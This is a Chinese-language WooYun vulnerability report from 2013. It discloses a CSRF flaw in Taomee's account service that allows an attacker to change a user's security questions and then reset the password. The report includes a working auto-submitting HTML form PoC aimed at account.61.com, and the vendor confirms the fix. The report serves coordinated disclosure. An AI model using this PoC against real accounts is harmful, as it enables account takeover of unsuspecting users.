当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021727

漏洞标题:淘米网某处设计缺陷可导致修改用户密码

相关厂商:淘米网

漏洞作者: 带馅儿馒头

提交时间:2013-04-15 19:33

修复时间:2013-04-16 14:48

公开时间:2013-04-16 14:48

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-15: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-16: 厂商提前公开漏洞,细节向公众公开

简要描述:

RT

详细说明:

1.注册一个用户,用户设置了密保问题后,可通过密保问题修改登录密码和支付密码;

6.jpg


2.系统在设置密保功能处未校验referer,导致可通过csrf修改用户密保,运行以下例子POC;

<html>
<body>
<form id="mantou" name="mantou" action="http://account.61.com/protect/setQuestions" method="POST">
<input type="hidden" name="q_key1" value="1" />
<input type="hidden" name="q_key2" value="12" />
<input type="hidden" name="q_key3" value="14" />
<input type="hidden" name="answer1" value="ceshi" />
<input type="hidden" name="answer2" value="ceshi1" />
<input type="hidden" name="answer3" value="ceshi2" />
<input type="submit" value="submit" />
</form>
<script>
document.mantou.submit()
</script>
</body>
</html>


3.运行POC效果截图;

2.jpg


4.现在我们就能通过密保问题找回用户密码了;

5.jpg


5.填入密保问题答案即可来到密码设置页面;

3.jpg


4.jpg

漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 带馅儿馒头@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-04-16 10:18

厂商回复:

非常感谢“带馅儿馒头”对淘米网的关注,漏洞已确认,该漏洞影响未设置过密保的米米号,我们正在联系开发人员修复漏洞,再次表示感谢!

最新状态:

2013-04-16:漏洞已修复,再次感谢“带馅儿馒头”对淘米网的关注,谢谢!


漏洞评价:

评论

  1. 2013-04-16 17:04 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    真是神速。淘米网对安全问题真是很上心。